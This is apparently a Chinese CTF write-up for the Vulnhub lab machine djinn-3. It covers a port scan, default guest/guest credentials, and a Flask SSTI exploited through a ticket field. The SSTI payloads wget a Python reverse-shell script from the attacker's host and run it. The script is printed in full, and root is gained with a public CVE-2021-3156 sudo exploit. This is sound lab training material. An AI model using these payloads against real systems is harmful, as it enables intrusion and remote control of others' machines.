---

title: Vulnhub	492	djinn-3
date: 2020-06-19
---
考点：flask

靶机链接：<https://www.vulnhub.com/entry/djinn-3,492/>
<!--more-->
## 环境配置

| 名称       | IP        |
| ---------- | --------- |
| Kali Linux | 10.0.2.15 |
| djinn-3    | 10.0.2.10 |

## 初步打点

### 端口扫描

```bash
$ export rip=10.0.2.10
$ sudo nmap -v -A -p- $rip
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:44:23:ac:b2:d9:82:e7:90:58:15:5e:40:23:ed:65 (RSA)
|   256 ae:04:85:6e:cb:10:4f:55:4a:ad:96:9e:f2:ce:18:4f (ECDSA)
|_  256 f7:08:56:19:97:b5:03:10:18:66:7e:7d:2e:0a:47:42 (ED25519)
80/tcp    open  http    lighttpd 1.4.45
|_http-title: Custom-ers
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: lighttpd/1.4.45
5000/tcp  open  http    Werkzeug httpd 1.0.1 (Python 3.6.9)
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/1.0.1 Python/3.6.9
31337/tcp open  Elite?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, NULL: 
|     username>
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     username> password> authentication failed
|   Help: 
|     username> password>
|   RPCCheck: 
|     username> Traceback (most recent call last):
|     File "/opt/.tick-serv/tickets.py", line 105, in <module>
|     main()
|     File "/opt/.tick-serv/tickets.py", line 93, in main
|     username = input("username> ")
|     File "/usr/lib/python3.6/codecs.py", line 321, in decode
|     (result, consumed) = self._buffer_decode(data, self.errors, final)
|     UnicodeDecodeError: 'utf-8' codec can't decode byte 0x80 in position 0: invalid start byte
|   SSLSessionReq: 
|     username> Traceback (most recent call last):
|     File "/opt/.tick-serv/tickets.py", line 105, in <module>
|     main()
|     File "/opt/.tick-serv/tickets.py", line 93, in main
|     username = input("username> ")
|     File "/usr/lib/python3.6/codecs.py", line 321, in decode
|     (result, consumed) = self._buffer_decode(data, self.errors, final)
|     UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd7 in position 13: invalid continuation byte
|   TerminalServerCookie: 
|     username> Traceback (most recent call last):
|     File "/opt/.tick-serv/tickets.py", line 105, in <module>
|     main()
|     File "/opt/.tick-serv/tickets.py", line 93, in main
|     username = input("username> ")
|     File "/usr/lib/python3.6/codecs.py", line 321, in decode
|     (result, consumed) = self._buffer_decode(data, self.errors, final)
|_    UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe0 in position 5: invalid continuation byte

```

### WEB测试

查看5000端口，感觉应该是存在flask SSTI漏洞

31337端口需要用户名密码，guest/guest 连上，发现可以发内容，并显示在5000端口

### 漏洞发现

![1](https://static.iihack.com/vulnhub/492/1.png)

![2](https://static.iihack.com/vulnhub/492/2.png)

还可以执行命令了

本地http服务目录存放反弹shell脚本`r.py`

```python
import sys, socket, subprocess, os

port = int(sys.argv[1])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.2.15', port))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

```

```bash
# 下载
> open                                                      
Title: 8
Description: {{request.application.__globals__.__builtins__.__import__('os').popen('wget http://10.0.2.15/reverse/r.py -O r.py').read()}}
# 运行
> open                                                      
Title: 9
Description: {{request.application.__globals__.__builtins__.__import__('os').popen('python3.6 r.py 444').read()}}
```



## 获得权限

### 靶机测试

本地监听，点击5000端口的链接，获得反弹shells

![3](https://static.iihack.com/vulnhub/492/3.png)

## 提权

使用CVE-2021-3156提权

```bash
$ git clone https://github.com/worawit/CVE-2021-3156
$ cd CVE-2021-3156
$ python exploit_nss.py 
```

![4](https://static.iihack.com/vulnhub/492/4.png)
